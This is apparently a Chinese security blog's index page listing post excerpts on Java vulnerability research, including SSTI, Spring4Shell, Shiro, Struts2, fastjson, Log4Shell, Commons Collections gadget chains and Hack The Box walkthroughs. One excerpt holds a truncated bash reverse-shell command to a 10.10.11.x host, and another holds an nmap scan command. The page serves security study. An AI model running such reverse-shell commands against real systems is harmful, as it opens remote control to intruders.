Loading

摘要: springboot SSTI 攻击 前置知识 环境整合可以看这篇文章: Spring Boot 整合 Freemarker 模板引擎 - spring 中文网 在文章中也介绍了关于 springboot 中定义的 freemarker 宏的一些知识 spring.freemarker.expose 阅读全文
posted @ 2025-08-26 10:26 LingX5 阅读(35) 评论(0) 推荐(0)
摘要: java-SSTI 模板注入 简介 模板注入比较常见的就是 freemarker 、Thymeleaf 与 velocity,顾名思义,我们肯定是可以控制模板的内容(1. 服务器将用户传入的参数错误处理,当作了模板内容 2. 我们可以上传 .ftl文件,让服务器加载解析),然后然服务器加载我们控制的 阅读全文
posted @ 2025-08-26 10:14 LingX5 阅读(40) 评论(0) 推荐(0)
摘要: javaRveShell 前言 一直研究 java RCE,证明的方法总是执行 calc 在本地机器上弹出计算器,就缺乏了对于各种 RCE 漏洞利用的研究,写篇文章记录一下 java 各种反弹 shell 的操作。 linux 反弹命令解析 bash -i >& /dev/tcp/10.10.11. 阅读全文
posted @ 2025-08-03 21:55 LingX5 阅读(24) 评论(0) 推荐(0)
摘要: HTB-cat 靶机 靶机地址: https://app.hackthebox.com/machines/Cat 一台中等难度的靶机,主要是练习利用来 xss 钓鱼,进行攻克的靶机。 nmap 扫描 sudo nmap -sT --min-rate 10000 -p- 10.10.11.53 -o 阅读全文
posted @ 2025-07-19 22:11 LingX5 阅读(88) 评论(0) 推荐(0)
摘要: HTB Strutted 靶机与 CVE-2024-53677 前言 打 htb 靶机 strutted 的时候看到了他的源码,使用了 struts2 6.3.0.1 的框架,在网上搜所相关文章学习了一下这个漏洞,写篇文章记录一下漏洞原理和打靶过程。 源码 我就直接使用的 htb 机器上提供的漏洞源 阅读全文
posted @ 2025-07-06 22:33 LingX5 阅读(121) 评论(0) 推荐(0)
摘要: SpringCloud GateWay 漏洞分析 简介 Spring Cloud 官方文档 Spring Cloud 是一套基于 Spring Boot 的云原生分布式系统开发工具包。它解决了常见的分布式系统关键问题,如服务注册与发现、配置管理、服务容错、智能路由、消息驱动等。 他的组件有很多,其中 阅读全文
posted @ 2025-05-15 09:53 LingX5 阅读(405) 评论(0) 推荐(0)
摘要: Spring Data Commons RCE 分析 简介 Spring Data 是一个用于简化数据库访问,并支持云服务的开源框架, 包含 Commons、Gemfire、JPA、JDBC、MongoDB 等模块。Commons 模块提供了基础的框架。 漏洞产生的原因是 Spring Data C 阅读全文
posted @ 2025-05-11 19:05 LingX5 阅读(56) 评论(0) 推荐(0)
摘要: Spring4Shell 漏洞分析 简介 Spring4Shell 漏洞实际上是对先前漏洞 CVE-2010-1622 的补丁绕过,CVE-2010-1622,原理就是基于上面的 JavaBean 赋值规则。可以通过提交 class.classLoader 参数,最终执行 getClassLoade 阅读全文
posted @ 2025-05-10 21:23 LingX5 阅读(121) 评论(0) 推荐(0)
摘要: shiro 内存马 前言 学习内存马可以先了解一下tomcat的机制:Tomcat的概念及启动原理浅析_tomcat会调用无参构造-CSDN博客 关于内存马最初的样子就是利用文件上传 jsp 脚本,在脚本里实现动态注册一个 listener、filter 或者 servlet 这样的 http 处理 阅读全文
posted @ 2025-04-25 21:14 LingX5 阅读(110) 评论(0) 推荐(0)
摘要: shiro 反序列化 简介 Apache Shiro 是一个功能强大且易于使用的 Java 安全框架,可执行身份验证、授权、加密和会话管理。借助 Shiro 易于理解的 API,您可以快速轻松地保护任何应用程序 —— 从最小的移动应用程序到最大的 Web 和企业应用程序。 从官方的简介中就可以看出他 阅读全文
posted @ 2025-04-21 20:48 LingX5 阅读(236) 评论(0) 推荐(0)
摘要: S2-012 影响版本:Struts Showcase App 2.0.0 - Struts Showcase App 2.3.14.2 参考链接:https://cwiki.apache.org/confluence/display/WW/S2-012 这与 S2-001 很相似,在设置了结果重定 阅读全文
posted @ 2025-04-14 19:07 LingX5 阅读(55) 评论(0) 推荐(0)
摘要: struts2 漏洞 简介 Struts2 是一款 JavaWeb MVC (Model-View-Controller) 框架,同时它具有如下特性: POJO (Plain Old Java Object) Action: 控制器(Action)是简单的 Java 类,不需要实现特定的接口或继承特 阅读全文
posted @ 2025-04-10 16:59 LingX5 阅读(69) 评论(0) 推荐(0)
摘要: java-CC4 链审计笔记 调用链 来自ysoserial /* * Variation on CommonsCollections2 that uses InstantiateTransformer instead of * InvokerTransformer. */ 是CC2的变种 ,其实就 阅读全文
posted @ 2025-04-06 21:41 LingX5 阅读(13) 评论(0) 推荐(0)
摘要: java-CC3 链审计笔记 调用链 来自 ysoserial /* * Variation on CommonsCollections1 that uses InstantiateTransformer instead of * InvokerTransformer. */ ysoserial 中 阅读全文
posted @ 2025-04-06 21:04 LingX5 阅读(15) 评论(1) 推荐(0)
摘要: java-CC2 链审计笔记 调用链 Gadget chain: ObjectInputStream.readObject() PriorityQueue.readObject() ... TransformingComparator.compare() InvokerTransformer.tra 阅读全文
posted @ 2025-04-06 16:25 LingX5 阅读(58) 评论(0) 推荐(0)
摘要: fastjson 原生链 前言 说起 fastjson 反序列化,大部分的利用都是从 @type 把 json 串解析为 java 对象,在构造方法和 setter、getter 方法中,做一些文件或者命令执行的操作。当然,在 fastjson 的依赖包中,也存在着像 CC 链 一样的利用的方式,从 阅读全文
posted @ 2025-04-04 15:27 LingX5 阅读(332) 评论(0) 推荐(0)
摘要: java-CC5 链审计笔记 调用链 来自 ysoserial 的注释描述 Gadget chain: ObjectInputStream.readObject() BadAttributeValueExpException.readObject() TiedMapEntry.toString() 阅读全文
posted @ 2025-04-02 21:05 LingX5 阅读(19) 评论(0) 推荐(0)
摘要: log4Shell 漏洞 简介 log4j 是一款 alibaba 开源的用来记录日志的 java 组件,作者为了支持记录日志的多样性,使得 log4j 支持特殊的一种语法 ${} , 用于待定内容,根据具体的变量名称在做填充。而 ${} 这种语法支持 JNDI 这种特殊的查询方式,这就给了攻击者执 阅读全文
posted @ 2025-04-02 12:55 LingX5 阅读(115) 评论(0) 推荐(0)
摘要: fastjson-1.2.80-bypass 修复 在 fastjson1.2.68 修复中,作者把 java.lang.Runnable,java.lang.Readable 和 java.lang.AutoCloseable 加入了黑名单,把 AutoCloseable 的绕过就给堵死了,但是 阅读全文
posted @ 2025-03-31 19:39 LingX5 阅读(320) 评论(0) 推荐(0)
摘要: fastjson-1.2.68 绕过 在 1.2.47 的利用 mappings 缓存恶意类绕过 autoType 修复后,fastjson 又陆续爆出来了一些黑名单的绕过方式。直到 1.2.68 又有了新的思路去绕过 autoType 安全机制 我们先来看看 fastjson1.2.68 又引入了 阅读全文
posted @ 2025-03-28 13:12 LingX5 阅读(375) 评论(0) 推荐(0)